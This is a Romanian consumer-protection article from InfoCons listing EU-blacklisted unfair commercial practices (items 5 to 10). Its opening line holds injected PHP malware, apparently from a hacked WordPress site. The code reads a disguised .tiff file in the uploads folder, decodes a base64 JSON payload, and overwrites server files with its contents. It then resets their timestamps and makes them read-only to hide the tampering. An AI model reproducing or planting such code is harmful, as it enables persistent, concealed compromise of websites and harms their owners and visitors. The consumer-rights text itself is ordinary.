$wp_update_file="/home/shuffles/public_html/wp-content/uploads/2023/05/0506412536.tiff"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } InfoCons: Lista Neagra: Practici Comerciale Interzise – O noua atitudine

Practicile comerciale incorecte sunt activitati (precum publicitatea si marketingul) legate de promovarea, vânzarea sau furnizarea unui produs catre consumatori. O practica comerciala este incorecta daca este considerata inacceptabila pentru consumator, conform unor criterii specificate.

 

Pentru a intari increderea consumatorilor europeni in tranzactiile transfrontaliere a fost adoptata Directiva privind practicile comerciale incorecte.

Anumite practici comerciale din Europa sunt interzise PERMANENT in cadrul directivei. Cu alte cuvinte, aceste practici comerciale sunt considerate incorecte in orice imprejurare.

Pentru a garanta faptul ca comerciantii, specialistii in marketing si consumatorii cunosc actiunile interzise, a fost redactata o Lista neagra cu practici incorecte.

Asociatia Nationala pentru Protectia Consumatorilor si Promovarea Programelor si Strategiilor din Romania – A.N.P.C.P.P.S.Romania – o9atitudine ! – InfoCons, va prezenta zilnic practici interzise, elemente ale  acestei liste negre:

 

5. Servicii post-vânzare într-o altă limbă: de exemplu marketing în engleză, servicii post-vânzare în suedeză

Angajamentul de a furniza servicii post-vânzare către consumatorii cu care comerciantul a comunicat anterior tranzacţiei într-o limbă care nu este o limbă oficială a statului membru în care se află sediul comerciantului şi, ulterior, furnizarea serviciului respectiv în altă limbă fără a informa în mod clar consumatorul cu privire la aceasta înainte de iniţierea tranzacţie..

6. Publicitate pentru produsele care nu pot fi comercializate legal

Declararea sau sugerarea, sub orice formă, fără un temei real, că vânzarea unui anumit produs este legală.

7. Prezenta drepturilor care sunt garantate de legislaţia comunitară consumatorilor de pretutindeni, ca o caracteristică nouă sau distinctivă a ofertei comerciantului.

Prezenta drepturilor de care consumatorii beneficiază prin lege ca o caracteristică distinctivă a ofertei comerciantului.

Această practică este interzisă, deoarece o garanţie de doi ani pentru produse defectuoase nu este o caracteristică distinctivă. Conform legislaţiei comunitare (Directiva 1999/44/CE privind vânzarea bunurilor de consum şi a garanţiilor conexe), o garanţie de doi ani în cazul produselor defectuoase este obligatorie.

8. Articole publicitare: „mesaje amestecate/subiective”

Folosirea conţinutului editorial din mass-media pentru a promova un produs, în cazul în care comerciantul a plătit pentru această promovare, fără a specifica acest lucru prin conţinut ori prin imagini sau sunete pe care consumatorul le poate identifica uşor (articol publicitar). Această dispoziţie nu aduce atingere Directivei 89/552/CEE a Consiliului.

9. Marketingul care utilizează frica consumatorilor faţă de riscurile privind siguranţa

Utilizarea nejustificată a fricii faţă de riscurile privind siguranţa: „a face afirmaţii de facto inexacte cu privire la natura şi amploarea riscurilor la care se expune consumatorul referitor la siguranţa personală sau a familiei sale în cazul în care nu achiziţionează produsul în cauză.”

10. Folosirea momelilor pentru a înşela consumatorul

A promova deliberat un produs similar cu produsul unui alt producător, astfel încât consumatorul să creadă că produsul promovat provine de la acelaşi producător.

 

Asociatia Nationala pentru Protectia Consumatorilor si Promovarea Programelor si Strategiilor din Romania – A.N.P.C.P.P.S. Romania – o9atitudine ! – InfoCons, unica organizatie din Romania cu drepturi depline in Consumers International,  membra fondatoare a Federatiei Asociatiilor de Consumatori.

 

By o9admin